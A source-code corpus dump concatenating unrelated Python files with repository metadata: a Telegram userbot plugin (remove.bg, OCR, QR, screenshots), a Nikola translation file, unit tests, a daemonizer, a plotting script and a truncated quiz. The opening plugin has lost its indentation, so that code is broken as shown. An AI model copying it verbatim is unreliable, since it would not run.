@register(outgoing=True, pattern=r"^\.rbg(?: |$)(.*)")
async def kbg(remob):
"""For .rbg command, Remove Image Background."""
if REM_BG_API_KEY is None:
await remob.edit(
"`Error: Remove.BG API key missing! Add it to environment vars or config.env.`"
)
return
input_str = remob.pattern_match.group(1)
message_id = remob.message.id
if remob.reply_to_msg_id:
message_id = remob.reply_to_msg_id
reply_message = await remob.get_reply_message()
await remob.edit("`Processing..`")
try:
if isinstance(
reply_message.media, MessageMediaPhoto
) or "image" in reply_message.media.document.mime_type.split("/"):
downloaded_file_name = await remob.client.download_media(
reply_message, TEMP_DOWNLOAD_DIRECTORY
)
await remob.edit("`Removing background from this image..`")
output_file_name = await ReTrieveFile(downloaded_file_name)
os.remove(downloaded_file_name)
else:
await remob.edit("`Bagaimana cara menghapus latar belakang ini ?`")
except Exception as e:
await remob.edit(str(e))
return
elif input_str:
await remob.edit(
f"`Removing background from online image hosted at`\n{input_str}"
)
output_file_name = await ReTrieveURL(input_str)
else:
await remob.edit("`Saya butuh sesuatu untuk menghapus latar belakang.`")
return
contentType = output_file_name.headers.get("content-type")
if "image" in contentType:
with io.BytesIO(output_file_name.content) as remove_bg_image:
remove_bg_image.name = "removed_bg.png"
await remob.client.send_file(
remob.chat_id,
remove_bg_image,
caption="Support @SharingUserbot",
force_document=True,
reply_to=message_id,
)
await remob.delete()
else:
await remob.edit(
"**Error (Invalid API key, I guess ?)**\n`{}`".format(
output_file_name.content.decode("UTF-8")
)
)
# this method will call the API, and return in the appropriate format
# with the name provided.
async def ReTrieveFile(input_file_name):
headers = {
"X-API-Key": REM_BG_API_KEY,
}
files = {
"image_file": (input_file_name, open(input_file_name, "rb")),
}
return requests.post(
"https://api.remove.bg/v1.0/removebg",
headers=headers,
files=files,
allow_redirects=True,
stream=True,
)
async def ReTrieveURL(input_url):
headers = {
"X-API-Key": REM_BG_API_KEY,
}
data = {"image_url": input_url}
return requests.post(
"https://api.remove.bg/v1.0/removebg",
headers=headers,
data=data,
allow_redirects=True,
stream=True,
)
@register(pattern=r"^\.ocr (.*)", outgoing=True)
async def ocr(event):
if not OCR_SPACE_API_KEY:
return await event.edit(
"`Error: OCR.Space API key is missing! Add it to environment variables or config.env.`"
)
await event.edit("`Sedang Membaca...`")
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
lang_code = event.pattern_match.group(1)
downloaded_file_name = await bot.download_media(
await event.get_reply_message(), TEMP_DOWNLOAD_DIRECTORY
)
test_file = await ocr_space_file(filename=downloaded_file_name, language=lang_code)
try:
ParsedText = test_file["ParsedResults"][0]["ParsedText"]
except BaseException:
await event.edit(
"`Tidak bisa membacanya.`\n`Saya rasa saya perlu kacamata baru.`"
)
else:
await event.edit(f"`Inilah yang bisa saya baca darinya:`\n\n{ParsedText}")
os.remove(downloaded_file_name)
@register(pattern=r"^\.decode$", outgoing=True)
async def parseqr(qr_e):
"""For .decode command, get QR Code/BarCode content from the replied photo."""
downloaded_file_name = await qr_e.client.download_media(
await qr_e.get_reply_message()
)
# parse the Official ZXing webpage to decode the QRCode
command_to_exec = [
"curl",
"-X",
"POST",
"-F",
"f=@" + downloaded_file_name + "",
"https://zxing.org/w/decode",
]
process = await asyncio.create_subprocess_exec(
*command_to_exec,
# stdout must a pipe to be accessible as process.stdout
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
# Wait for the subprocess to finish
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
os.remove(downloaded_file_name)
if not t_response:
LOGS.info(e_response)
LOGS.info(t_response)
return await qr_e.edit("Gagal untuk decode.")
soup = BeautifulSoup(t_response, "html.parser")
qr_contents = soup.find_all("pre")[0].text
await qr_e.edit(qr_contents)
@register(pattern=r"^\.barcode(?: |$)([\s\S]*)", outgoing=True)
async def bq(event):
"""For .barcode command, genrate a barcode containing the given content."""
await event.edit("`Processing..`")
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.barcode <long text to include>`"
reply_msg_id = event.message.id
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
reply_msg_id = previous_message.id
if previous_message.media:
downloaded_file_name = await event.client.download_media(previous_message)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = "".join(m.decode("UTF-8") + "\r\n" for m in m_list)
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
return event.edit("SYNTAX: `.barcode <long text to include>`")
bar_code_type = "code128"
try:
bar_code_mode_f = barcode.get(bar_code_type, message, writer=ImageWriter())
filename = bar_code_mode_f.save(bar_code_type)
await event.client.send_file(event.chat_id, filename, reply_to=reply_msg_id)
os.remove(filename)
except Exception as e:
return await event.edit(str(e))
await event.delete()
@register(pattern=r"^\.makeqr(?: |$)([\s\S]*)", outgoing=True)
async def make_qr(makeqr):
"""For .makeqr command, make a QR Code containing the given content."""
input_str = makeqr.pattern_match.group(1)
message = "SYNTAX: `.makeqr <long text to include>`"
reply_msg_id = None
if input_str:
message = input_str
elif makeqr.reply_to_msg_id:
previous_message = await makeqr.get_reply_message()
reply_msg_id = previous_message.id
if previous_message.media:
downloaded_file_name = await makeqr.client.download_media(previous_message)
m_list = None
with open(downloaded_file_name, "rb") as file:
m_list = file.readlines()
message = "".join(media.decode("UTF-8") + "\r\n" for media in m_list)
os.remove(downloaded_file_name)
else:
message = previous_message.message
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=10,
border=4,
)
qr.add_data(message)
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white")
img.save("img_file.webp", "PNG")
await makeqr.client.send_file(
makeqr.chat_id, "img_file.webp", reply_to=reply_msg_id
)
os.remove("img_file.webp")
await makeqr.delete()
@register(pattern=r"^\.ss (.*)", outgoing=True)
async def capture(url):
"""For .ss command, capture a website's screenshot and send the photo."""
await url.edit("`Processing...`")
chrome_options = await options()
chrome_options.add_argument("--test-type")
chrome_options.add_argument("--ignore-certificate-errors")
chrome_options.arguments.remove("--window-size=1920x1080")
driver = await chrome(chrome_options=chrome_options)
input_str = url.pattern_match.group(1)
link_match = match(r"\bhttps?://.*\.\S+", input_str)
if link_match:
link = link_match.group()
else:
return await url.edit("`I need a valid link to take screenshots from.`")
driver.get(link)
height = driver.execute_script(
"return Math.max(document.body.scrollHeight, document.body.offsetHeight, "
"document.documentElement.clientHeight, document.documentElement.scrollHeight, "
"document.documentElement.offsetHeight);"
)
width = driver.execute_script(
"return Math.max(document.body.scrollWidth, document.body.offsetWidth, "
"document.documentElement.clientWidth, document.documentElement.scrollWidth, "
"document.documentElement.offsetWidth);"
)
driver.set_window_size(width + 125, height + 125)
wait_for = height / 1000
await url.edit(
"`Generating screenshot of the page...`"
f"\n`Height of page = {height}px`"
f"\n`Width of page = {width}px`"
f"\n`Waiting ({int(wait_for)}s) for the page to load.`"
)
await sleep(int(wait_for))
im_png = driver.get_screenshot_as_png()
# saves screenshot of entire page
driver.quit()
message_id = url.message.id
if url.reply_to_msg_id:
message_id = url.reply_to_msg_id
with io.BytesIO(im_png) as out_file:
out_file.name = "screencapture.png"
await url.edit("`Uploading screenshot as file..`")
await url.client.send_file(
url.chat_id,
out_file,
caption=input_str,
force_document=True,
reply_to=message_id,
)
await url.delete()
CMD_HELP.update(
{
"tts": "**Plugin : **`tts`\
\n\n • **Syntax :** `.tts` <text/reply>\
\n • **Function : **Menerjemahkan teks ke ucapan untuk bahasa yang disetel. \
\n\n • **NOTE :** Gunakan .lang tts <kode bahasa> untuk menyetel bahasa untuk tr **(Bahasa Default adalah bahasa Indonesia)**\
"
}
)
CMD_HELP.update(
{
"translate": "**Plugin : **`Terjemahan`\
\n\n • **Syntax :** `.tr` <text/reply>\
\n • **Function : **Menerjemahkan teks ke bahasa yang disetel.\
\n\n • **NOTE :** Gunakan .lang tr <kode bahasa> untuk menyetel bahasa untuk tr **(Bahasa Default adalah bahasa Indonesia)**\
"
}
)
CMD_HELP.update(
{
"carbon": "**Plugin : **`carbon`\
\n\n • **Syntax :** `.carbon` <text/reply>\
\n • **Function : **Percantik kode Anda menggunakan carbon.now.sh\
\n\n • **NOTE :** Gunakan .crblang <text> untuk menyetel bahasa kode Anda.\
"
}
)
CMD_HELP.update(
{
"removebg": "**Plugin : **`removebg`\
\n\n • **Syntax :** `.rbg` <Tautan ke Gambar> atau balas gambar apa pun (Peringatan: tidak berfungsi pada stiker.)\
\n • **Function : **Menghapus latar belakang gambar, menggunakan API remove.bg\
"
}
)
CMD_HELP.update(
{
"ocr": "**Plugin : **`ocr`\
\n\n • **Syntax :** `.ocr` <kode bahasa>\
\n • **Function : **Balas gambar atau stiker untuk mengekstrak teks media tersebut.\
"
}
)
CMD_HELP.update(
{
"youtube": "**Plugin : **`youtube`\
\n\n • **Syntax :** `.yt` <jumlah> <query>\
\n • **Function : **Melakukan Pencarian YouTube. Dapat menentukan jumlah hasil yang dibutuhkan (default adalah 5)\
"
}
)
CMD_HELP.update(
{
"google": "**Plugin : **`google`\
\n\n • **Syntax :** `.google` <flags> <query>\
\n • **Function : **Untuk Melakukan pencarian di google (default 5 hasil pencarian)\
\n • **Flags :** `-l` **= Untuk jumlah hasil pencarian.**\
\n • **Example :** `.google -l4 mrismanaziz` atau `.google mrismanaziz`\
"
}
)
CMD_HELP.update(
{
"wiki": "**Plugin : **`wiki`\
\n\n • **Syntax :** `.wiki` <query>\
\n • **Function : **Melakukan pencarian di Wikipedia.\
"
}
)
CMD_HELP.update(
{
"barcode": "**Plugin : **`barcode`\
\n\n • **Syntax :** `.barcode` <content>\
\n • **Function :** Buat Kode Batang dari konten yang diberikan.\
\n\n • **Example :** `.barcode www.google.com`\
\n\n • **Syntax :** `.makeqr` <content>\
\n • **Function :** Buat Kode QR dari konten yang diberikan.\
\n\n • **Example :** `.makeqr www.google.com`\
\n\n • **NOTE :** Gunakan .decode <reply to barcode / qrcode> untuk mendapatkan konten yang didekodekan.\
"
}
)
CMD_HELP.update(
{
"image_search": "**Plugin : **`image_search`\
\n\n • **Syntax :** `.img` <search_query>\
\n • **Function : **Melakukan pencarian gambar di Google dan menampilkan 15 gambar.\
"
}
)
CMD_HELP.update(
{
"ytdl": "**Plugin : **`ytdl`\
\n\n • **Syntax :** `.ytaudio` <url>\
\n • **Function : **Untuk Mendownload lagu dari YouTube.\
\n\n • **Syntax :** `.ytvideo` <url>\
\n • **Function : **Untuk Mendownload video dari YouTube.\
"
}
)
CMD_HELP.update(
{
"screenshot": "**Plugin : **`screenshot`\
\n\n • **Syntax :** `.ss` <url>\
\n • **Function : **Mengambil tangkapan layar dari situs web dan mengirimkan tangkapan layar.\
\n • **Example : .ss http://www.google.com\
"
}
)
CMD_HELP.update(
{
"currency": "**Plugin : **`currency`\
\n\n • **Syntax :** `.currency` <amount> <from> <to>\
\n • **Function : **Mengonversi berbagai mata uang untuk Anda.\
"
}
)
CMD_HELP.update(
{
"ud": "**Plugin : **`Urban Dictionary`\
\n\n • **Syntax :** `.ud` <query>\
\n • **Function : **Melakukan pencarian di Urban Dictionary.\
"
}
)
| 32.989758
| 136
| 0.592109
|
2d537e68c0c2ae9afa9e1a562323f66969b4a194
| 1,757
|
py
|
Python
|
nikola/data/themes/base/messages/messages_bs.py
|
asmeurer/nikola
|
ea1c651bfed0fd6337f1d22cf8dd99899722912c
|
[
"MIT"
] | 1,901
|
2015-01-02T02:49:51.000Z
|
2022-03-30T23:31:35.000Z
|
nikola/data/themes/base/messages/messages_bs.py
|
asmeurer/nikola
|
ea1c651bfed0fd6337f1d22cf8dd99899722912c
|
[
"MIT"
] | 1,755
|
2015-01-01T08:17:16.000Z
|
2022-03-24T18:02:22.000Z
|
nikola/data/themes/base/messages/messages_bs.py
|
asmeurer/nikola
|
ea1c651bfed0fd6337f1d22cf8dd99899722912c
|
[
"MIT"
] | 421
|
2015-01-02T18:06:37.000Z
|
2022-03-28T23:18:54.000Z
|
# -*- encoding:utf-8 -*-
"""Autogenerated file, do not edit. Submit translations on Transifex."""
MESSAGES = {
"%d min remaining to read": "%d minuta preostalo za čitanje",
"(active)": "(aktivno)",
"Also available in:": "Takođe dostupan u:",
"Archive": "Arhiva",
"Atom feed": "",
"Authors": "Autori",
"Categories": "Kategorije",
"Comments": "Komentari",
"LANGUAGE": "Bosanski",
"Languages:": "Jezici:",
"More posts about %s": "Više članaka o %s",
"Newer posts": "Novije objave",
"Next post": "Naredni članak",
"Next": "",
"No posts found.": "Nema članaka.",
"Nothing found.": "Ništa nije pronađeno.",
"Older posts": "Starije objave",
"Original site": "Izvorni sajt",
"Posted:": "Objavljeno:",
"Posts about %s": "Objave o %s",
"Posts by %s": "Objave prema %s",
"Posts for year %s": "Objave u godini %s",
"Posts for {month_day_year}": "Objave za {month_day_year}",
"Posts for {month_year}": "Objave za {month_year}",
"Previous post": "Prethodni članak",
"Previous": "",
"Publication date": "Datum objavljivanja",
"RSS feed": "RSS feed",
"Read in English": "Pročitaj na bosanskom",
"Read more": "Pročitaj više",
"Skip to main content": "Preskoči na glavni sadržaj",
"Source": "Izvor",
"Subcategories:": "Podkategorije:",
"Tags and Categories": "Oznake i kategorije",
"Tags": "Oznake",
"Toggle navigation": "",
"Uncategorized": "Bez kategorije",
"Up": "",
"Updates": "Ažuriranja",
"Write your page here.": "Vašu stranicu napišite ovdje.",
"Write your post here.": "Vaš članak napišite ovdje.",
"old posts, page %d": "stare objave, strana %d",
"page %d": "strana %d",
"updated": "",
}
| 35.14
| 72
| 0.595902
|
05ccd24debd44e59c4bef8d60f2fb3275a2e50ba
| 2,909
|
py
|
Python
|
src/config/common/tests/test_analytics_client.py
|
biswajit-mandal/contrail-controller
|
80c4a7e8515f7296b18ba4c21a439bd3daefcc4a
|
[
"Apache-2.0"
] | 5
|
2015-01-08T17:34:41.000Z
|
2017-09-28T16:00:25.000Z
|
src/config/common/tests/test_analytics_client.py
|
biswajit-mandal/contrail-controller
|
80c4a7e8515f7296b18ba4c21a439bd3daefcc4a
|
[
"Apache-2.0"
] | 2
|
2018-12-04T02:20:52.000Z
|
2018-12-22T06:16:30.000Z
|
src/config/common/tests/test_analytics_client.py
|
biswajit-mandal/contrail-controller
|
80c4a7e8515f7296b18ba4c21a439bd3daefcc4a
|
[
"Apache-2.0"
] | 18
|
2017-01-12T09:28:44.000Z
|
2019-04-18T20:47:42.000Z
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2014 Cloudwatt
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sylvain Afchain, eNovance.
import mock
import unittest
from cfgm_common.analytics_client import Client
class TestOpenContrailClient(unittest.TestCase):
def setUp(self):
super(TestOpenContrailClient, self).setUp()
self.client = Client('http://127.0.0.1:8081', {'arg1': 'aaa'})
self.get_resp = mock.MagicMock()
self.get = mock.patch('requests.get',
return_value=self.get_resp).start()
self.get_resp.raw_version = 1.1
self.get_resp.status_code = 200
def test_analytics_request_without_data(self):
self.client.request('/fake/path/', 'fake_uuid')
call_args = self.get.call_args_list[0][0]
call_kwargs = self.get.call_args_list[0][1]
expected_url = ('http://127.0.0.1:8081/fake/path/fake_uuid')
self.assertEqual(expected_url, call_args[0])
data = call_kwargs.get('data')
expected_data = {'arg1': 'aaa'}
self.assertEqual(expected_data, data)
def test_analytics_request_with_data(self):
self.client.request('fake/path/', 'fake_uuid',
{'key1': 'value1',
'key2': 'value2'})
call_args = self.get.call_args_list[0][0]
call_kwargs = self.get.call_args_list[0][1]
expected_url = ('http://127.0.0.1:8081/fake/path/fake_uuid')
self.assertEqual(expected_url, call_args[0])
data = call_kwargs.get('data')
expected_data = {'arg1': 'aaa',
'key1': 'value1',
'key2': 'value2'}
self.assertEqual(expected_data, data)
self.client.request('fake/path/', 'fake_uuid',
{'key3': 'value3',
'key4': 'value4'})
call_args = self.get.call_args_list[1][0]
call_kwargs = self.get.call_args_list[1][1]
expected_url = ('http://127.0.0.1:8081/fake/path/fake_uuid')
self.assertEqual(expected_url, call_args[0])
data = call_kwargs.get('data')
expected_data = {'arg1': 'aaa',
'key3': 'value3',
'key4': 'value4'}
self.assertEqual(expected_data, data)
| 34.223529
| 78
| 0.607769
|
4cbf23f7bf1029ef8a3da82520f908398ffbff3e
| 346
|
py
|
Python
|
Olympiad Solutions/URI/1467.py
|
Ashwanigupta9125/code-DS-ALGO
|
49f6cf7d0c682da669db23619aef3f80697b352b
|
[
"MIT"
] | 36
|
2019-12-27T08:23:08.000Z
|
2022-01-24T20:35:47.000Z
|
Olympiad Solutions/URI/1467.py
|
Ashwanigupta9125/code-DS-ALGO
|
49f6cf7d0c682da669db23619aef3f80697b352b
|
[
"MIT"
] | 10
|
2019-11-13T02:55:18.000Z
|
2021-10-13T23:28:09.000Z
|
Olympiad Solutions/URI/1467.py
|
Ashwanigupta9125/code-DS-ALGO
|
49f6cf7d0c682da669db23619aef3f80697b352b
|
[
"MIT"
] | 53
|
2020-08-15T11:08:40.000Z
|
2021-10-09T15:51:38.000Z
|
# Ivan Carvalho
# Solution to https://www.urionlinejudge.com.br/judge/problems/view/1467
#!/usr/bin/env python2.7
# encoding : utf-8
while True:
try:
e = raw_input()
if e in ["0 0 0","1 1 1"]:
print "*"
elif e in ["1 0 0","0 1 1"]:
print "A"
elif e in ["1 0 1","0 1 0"]:
print "B"
else:
print "C"
except EOFError:
break
| 19.222222
| 72
| 0.589595
|
cb02e21abd5dd43d214f96868619ec3b23eb9101
| 492
|
py
|
Python
|
product/migrations/0013_product_code_product.py
|
SergueiNK/oc_projet_p8
|
a2a3e3df7ecd048207f342343163a3aecf246423
|
[
"Unlicense"
] | null | null | null |
product/migrations/0013_product_code_product.py
|
SergueiNK/oc_projet_p8
|
a2a3e3df7ecd048207f342343163a3aecf246423
|
[
"Unlicense"
] | 3
|
2021-12-04T16:47:44.000Z
|
2021-12-04T19:25:31.000Z
|
product/migrations/0013_product_code_product.py
|
SergueiNK/oc_projet_p8
|
a2a3e3df7ecd048207f342343163a3aecf246423
|
[
"Unlicense"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-10-26 22:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0012_alter_product_product_name'),
]
operations = [
migrations.AddField(
model_name='product',
name='code_product',
field=models.CharField(default=0, max_length=100, unique=True, verbose_name='code of product'),
preserve_default=False,
),
]
| 24.6
| 107
| 0.628049
|
a8e0e237ae94ac73d8abde7ca53318639b99b61c
| 1,474
|
py
|
Python
|
OnlySemWork/plot.py
|
rohun-tripati/UGP-Robotics
|
46517c6393724937cc2625252fd88036a1a3fef7
|
[
"Unlicense"
] | null | null | null |
OnlySemWork/plot.py
|
rohun-tripati/UGP-Robotics
|
46517c6393724937cc2625252fd88036a1a3fef7
|
[
"Unlicense"
] | null | null | null |
OnlySemWork/plot.py
|
rohun-tripati/UGP-Robotics
|
46517c6393724937cc2625252fd88036a1a3fef7
|
[
"Unlicense"
] | null | null | null |
import numpy as np
import sys
import numpy.linalg as linalg
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
import math
def plotthis(num,ellips,ellarr, tree, adjval): #module from the net
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for k in range(0,num):#fornow
center = ellips[k] #print "center = ", center
A = ellarr[k] #print "a = ", A
U, s, rotation = linalg.svd(A)
radii = 1.0/np.sqrt(s)
u = np.linspace(0.0, 2* np.pi, 100)
v = np.linspace(0.0, 2*np.pi, 100)
x = radii[0] * np.outer(np.cos(u), np.sin(v))
y = radii[1] * np.outer(np.sin(u), np.sin(v))
z = radii[2] * np.outer(np.ones_like(u), np.cos(v))
for i in range(len(x)):
for j in range(len(x)):
[x[i,j],y[i,j],z[i,j]] = np.dot([x[i,j],y[i,j],z[i,j]], rotation) + center
if k==0: #Different colors
ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='b', alpha=0.2)
else:
ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='r', alpha=0.2)
# print "x = ", x, len(x[0]) # print "y = ", y, len(y) # print "Z = ", z, len(z)
for lin in tree:
n = []; m= []; p = [];
for i in range(0,2):
n.append(adjval[lin[i]][0])
for i in range(0,2):
m.append(adjval[lin[i]][1])
for i in range(0,2):
p.append(adjval[lin[i]][2])
ax.plot_wireframe(n,m,p, color="green", linewidth=2.0, linestyle="-")
plt.show()
plt.close(fig) #print "finished plotthis"
del fig
| 29.48
| 86
| 0.601085
|
6daa873cddfa2502c6d8e41ffaba39095657e070
| 1,020
|
py
|
Python
|
kubernetes/test/test_v1_resource_field_selector.py
|
jashandeep-sohi/kubernetes-python
|
e057f273069de445a2d5a250ac5fe37d79671f3b
|
[
"Apache-2.0"
] | 1
|
2020-05-08T12:41:04.000Z
|
2020-05-08T12:41:04.000Z
|
kubernetes/test/test_v1_resource_field_selector.py
|
jashandeep-sohi/kubernetes-python
|
e057f273069de445a2d5a250ac5fe37d79671f3b
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/test/test_v1_resource_field_selector.py
|
jashandeep-sohi/kubernetes-python
|
e057f273069de445a2d5a250ac5fe37d79671f3b
|
[
"Apache-2.0"
] | 2
|
2021-07-09T08:49:05.000Z
|
2021-08-03T18:08:36.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_resource_field_selector import V1ResourceFieldSelector
class TestV1ResourceFieldSelector(unittest.TestCase):
""" V1ResourceFieldSelector unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ResourceFieldSelector(self):
"""
Test V1ResourceFieldSelector
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_resource_field_selector.V1ResourceFieldSelector()
pass
if __name__ == '__main__':
unittest.main()
| 22.666667
| 105
| 0.72549
|
07395514772774691ef0ff993042d9bbd8e7dc0b
| 7,196
|
py
|
Python
|
daemonize.py
|
IloveKanade/k3daemonize
|
ac615704a34c358c7a8490013e8bc083e547e014
|
[
"MIT"
] | null | null | null |
daemonize.py
|
IloveKanade/k3daemonize
|
ac615704a34c358c7a8490013e8bc083e547e014
|
[
"MIT"
] | 2
|
2021-10-16T11:40:07.000Z
|
2022-03-23T06:57:44.000Z
|
daemonize.py
|
IloveKanade/k3daemonize
|
ac615704a34c358c7a8490013e8bc083e547e014
|
[
"MIT"
] | 1
|
2021-08-18T07:48:38.000Z
|
2021-08-18T07:48:38.000Z
|
import errno
import fcntl
import logging
import os
import signal
import sys
import time
import __main__
logger = logging.getLogger(__name__)
class Daemon(object):
def __init__(self,
pidfile=None,
stdin='/dev/null',
stdout='/dev/null',
stderr='/dev/null',
close_fds=False):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile or _default_pid_file()
# NOTE: We need to open another separate file to avoid the file
# being reopened again.
# In which case, process loses file lock.
#
# From "man fcntl":
# As well as being removed by an explicit F_UNLCK, record locks are
# automatically released when the process terminates or if it
# closes any file descriptor referring to a file on which locks
# are held. This is bad: it means that a process can lose the locks
# on a file like /etc/passwd or /etc/mtab when for some reason a
# library function decides to open, read and close it.
self.lockfile = self.pidfile + ".lock"
self.lockfp = None
self.close_fds = close_fds
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
_close_std_io()
sys.exit(0)
except OSError as e:
logger.error("fork #1 failed: " + repr(e))
sys.exit(1)
# decouple from parent environment
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
_close_std_io()
sys.exit(0)
except OSError as e:
logger.error("fork #2 failed: " + repr(e))
sys.exit(1)
if self.close_fds:
_close_fds()
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(self.stdin, 'r')
so = open(self.stdout, 'a+')
se = open(self.stderr, 'a+')
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
logger.info("OK daemonized")
def trylock_or_exit(self, timeout=10):
interval = 0.1
n = int(timeout / interval) + 1
flag = fcntl.LOCK_EX | fcntl.LOCK_NB
for ii in range(n):
fd = os.open(self.lockfile, os.O_RDWR | os.O_CREAT)
fcntl.fcntl(fd, fcntl.F_SETFD,
fcntl.fcntl(fd, fcntl.F_GETFD, 0)
| fcntl.FD_CLOEXEC)
try:
fcntl.lockf(fd, flag)
self.lockfp = os.fdopen(fd, 'w+')
break
except IOError as e:
os.close(fd)
if e[0] == errno.EAGAIN:
time.sleep(interval)
else:
raise
else:
logger.info("Failure acquiring lock %s" % (self.lockfile, ))
sys.exit(1)
logger.info("OK acquired lock %s" % (self.lockfile))
def unlock(self):
if self.lockfp is None:
return
fd = self.lockfp.fileno()
fcntl.lockf(fd, fcntl.LOCK_UN)
self.lockfp.close()
self.lockfp = None
def start(self):
self.daemonize()
self.init_proc()
def init_proc(self):
self.trylock_or_exit()
self.write_pid_or_exit()
def write_pid_or_exit(self):
self.pf = open(self.pidfile, 'w+')
pf = self.pf
fd = pf.fileno()
fcntl.fcntl(fd, fcntl.F_SETFD,
fcntl.fcntl(fd, fcntl.F_GETFD, 0)
| fcntl.FD_CLOEXEC)
try:
pid = os.getpid()
logger.debug('write pid:' + str(pid))
pf.truncate(0)
pf.write(str(pid))
pf.flush()
except Exception as e:
logger.exception('write pid failed.' + repr(e))
sys.exit(0)
def stop(self):
pid = None
if not os.path.exists(self.pidfile):
logger.debug('pidfile not exist:' + self.pidfile)
return
try:
pid = _read_file(self.pidfile)
pid = int(pid)
os.kill(pid, signal.SIGTERM)
return
except Exception as e:
logger.warn('{e} while get and kill pid={pid}'.format(
e=repr(e), pid=pid))
def _read_file(fn):
with open(fn, 'r') as f:
return f.read()
def _close_std_io():
os.close(0)
os.close(1)
os.close(2)
def _close_fds():
try:
max_fd = os.sysconf("SC_OPEN_MAX")
except ValueError as e:
logger.warning(repr(e) + ' while get max fds of a process')
max_fd = 65536
for i in range(3, max_fd):
try:
os.close(i)
except OSError:
pass
def _default_pid_file():
if hasattr(__main__, '__file__'):
name = __main__.__file__
name = os.path.basename(name)
if name == '<stdin>':
name = '__stdin__'
return '/var/run/' + name.rsplit('.', 1)[0]
else:
return '/var/run/pykit.daemonize'
def daemonize_cli(run_func, pidfn, close_fds=False):
"""
Read command line arguments and then start, stop or restart a daemon process.
:param run_func: a callable object such as a `function` or `lambda` to run after the daemon
process is created.
:param pidfn: abosolute path of `pid` file. It is used to identify a daemon process.
Thus two processes those are with the same `pid` file can not run at the same time.
:param close_fds: If it is `True`, besides `stdin`, `stdout` and `stderr`, all other file descriptors
will also be closed.
:return: None
"""
logging.basicConfig(stream=sys.stderr)
logging.getLogger(__name__).setLevel(logging.DEBUG)
d = Daemon(pidfile=pidfn, close_fds=close_fds)
logger.info("sys.argv: " + repr(sys.argv))
try:
if len(sys.argv) == 1:
d.init_proc()
run_func()
elif len(sys.argv) == 2:
if 'start' == sys.argv[1]:
d.start()
run_func()
elif 'stop' == sys.argv[1]:
d.stop()
elif 'restart' == sys.argv[1]:
d.stop()
d.start()
run_func()
else:
logger.error("Unknown command: %s" % (sys.argv[1]))
print("Unknown command")
sys.exit(2)
sys.exit(0)
else:
print("usage: %s start|stop|restart" % sys.argv[0])
sys.exit(2)
except Exception as e:
logger.exception(repr(e))
standard_daemonize = daemonize_cli
| 26.167273
| 105
| 0.529878
|
bd5d9b8605c51d4fdbab510b566427379f31a499
| 18,565
|
py
|
Python
|
Math Police.py
|
RobinhoodDev/MathPolice
|
c73aadaeaee5ba45ebc4f3e3c8431a4a53ee531b
|
[
"MIT"
] | 1
|
2021-10-20T11:48:50.000Z
|
2021-10-20T11:48:50.000Z
|
Math Police.py
|
RobinhoodDev/MathPolice
|
c73aadaeaee5ba45ebc4f3e3c8431a4a53ee531b
|
[
"MIT"
] | null | null | null |
Math Police.py
|
RobinhoodDev/MathPolice
|
c73aadaeaee5ba45ebc4f3e3c8431a4a53ee531b
|
[
"MIT"
] | null | null | null |
score = 0
score = int(score)
print("Welcome to Math Police! Created by Robinhood#6198.")
d = input("Which difficulty would you like to play?")
if d == "Easy":
print("Welcome to Math Police Easy!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word cat into a numeric value"))
if answer1 == 24:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word dog into a numeric value"))
if answer2 == 26:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word hats into a numeric value"))
if answer3 == 48:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word lunch into a numeric value."))
if answer4 == 58:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word danger into a numeric value."))
if answer5 == 49:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
